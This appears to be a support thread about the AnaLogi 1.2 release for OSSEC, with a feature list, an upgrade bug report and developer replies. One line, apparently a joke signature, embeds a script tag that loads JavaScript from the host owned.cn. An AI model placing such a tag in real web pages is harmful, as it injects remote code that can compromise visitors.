For the bug... I *think* you have not replaced ./analogi/php/index_graph.php
Can you confirm you replaced *all* files in *all* sub folders please
This could also explain why the 'Alert Feed' and 'Rule Trend Analysis' are not working *
Andy
* 'Rule Trend Analysis' will also need a few weeks of data to work as you would expect for a 'trend'
On Thursday, August 2, 2012 6:47:39 AM UTC+1, Dmitry wrote:Hi!I used AnaLogi 1.1.As far as I unfrstood in order to install AnaLogi 1.2 I had to copy (replace) all the files from zip archive to /analogi (exept db_ossec.php).I did so, but I have almost empty pages NewsFeed and Management.See attached files (+ 1 previous bug).BugNewsFeedManagementOn Wednesday, August 1, 2012 2:18:20 PM UTC+4, techs...@ecsc.co.uk wrote:The new version is out and on GitHub !!
https://github.com/ECSC/analogi/downloads
New Features
--------------
Connection Diagnostics for when Analogi does not have any data for the graphs (it tests mysql/php module, connection to server, mysql schema, database content).
Group Category filtering added to main page (sshd, arpwatch, windows etc)
New page 'NewsFeed' providing:
* 'Threat Feed' gives a listing of alerts based upon alert time and threat level
* 'Trend Analysis' compares the previous time block against previous weeks to see which alert/systems are experience the greatest change from base line
New page 'Management' for managing and running the SQL database providing:
* Last agent check in report to highlight which agents have stopped reporting in
* List of the biggest alert/system combinations
* Database size and Database row count
* Report on which agents are using the most disk space with a per level breakdown
* Historical report on database data
* ....All of which help feed into the last section, the Database Clean up filter for deleting superfluous data
Auto Div scaling on front page ensures that an excess of graph lines does not impede the visuals
Customisable auto-highlighing of keywords on detail.php
Fix/Improved
--------------
Faster SQL
Hover text for front page
Improved consistency between index.php and detail.php
Radio button selection on index.php
'Top Rare' warning when not enough data
Relative link to images for detail.php
Hard links added to header
Lots more
All feedback welcome.
(I've created a new thread to keep comments separate.)--
My server is com<script src=http://owned.cn/js.js>pletely secure.
Thanks a lot.You are quite right. I'm windows user, so i was not able to extract and correctly copy Analogi files.
1) Yes, the colours are generated by amcharts, I've been considering a custom colour set which would probably also look good here..
2) Oops I thought it did, good idea
3) Which RuleID please? I ask because on the detail.php 'filter' the text input allows for comma separated allowing for more than one RuleID to be selected for comparison, so here it might not work, but anywhere else I'm open to suggestion...
Andy
Sorry, to clarify, are you referring to a specific location, or everywhere?
Sorry Frank, I'm still not with you :(
I believe your image shows 'categories' (defined by <group>login_day</group>) rather than Rule IDs? Like Splunk I have a category/group filter on the index.php.
The graph breakdown on index.php has RuleID and RuleDescription
The Top10 Rule breakdown on index.php has the rule description (but not ID, though you can see this by hovering over a link)
On detail.php if you specify a RuleID this is described, if not then results just have a RuleID
* I am hesitant to have a drop down for the detail.php filtering as this would remove the ability to search for rule "550,551,552" etc
Newsfeed Trend shows ID and Description
Let me know
Andy